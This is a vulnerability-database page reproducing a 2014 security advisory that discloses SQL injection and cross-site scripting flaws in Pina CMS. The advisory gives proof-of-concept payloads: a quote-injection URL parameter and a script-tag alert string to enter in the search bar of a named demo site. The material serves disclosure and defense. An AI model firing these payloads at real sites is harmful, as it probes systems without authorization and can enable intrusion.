Vulners
Lucene search
Pina CMS Cross Site Scripting / SQL Injection
🗓️ 17 Feb 2014 00:00:00Reported by Shadman TanjimType 
packetstorm🔗 packetstormsecurity.com👁 39 Views
`############################################################################
# Title: Pina CMS SQL Injection and XSS Vulnerabilities
# Vendor: www.pinacms.com
# Vendor Notified: 15-02-2014
# Vendor Replied: 16-02-2014
# Release in Public: 18-02-2014
# Tested on: Windows/Linux
# Author/Found by: Shadman Tanjim
# Website: www.secupent.com and www.vulnerability.io
# Email: [email protected] or [email protected]
# Twitter: twitter.com/secupent
# Facebook: fb.me/secupent
############################################################################
1. Vulnerability no 1 (SQL Injection):
http://target.com/page.php?action=post.manage.home&blog_id=1%27%22
Demo screenshot: https://www.dropbox.com/s/cpxvk7h1dxu8xnv/pina2.png
2. Vulnerability no 2. (XSS):
Go to this link: http://demo.pinacms.com/page.php?action=post.manage.home
Apply this JavaScript on search bar
"/><script>alert(574127);</script>
Demo screenshot: https://www.dropbox.com/s/8jc51blyepypfas/pina1.png
Greets: Sayem Islam, Maruf Alam, Isti Ak Ahmed, Team BCA, Team Secupent and all Cyber Security Expert and Bug Hunters.....
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Feb 2014 00:00Current
0.4Low risk
Vulners AI Score0.4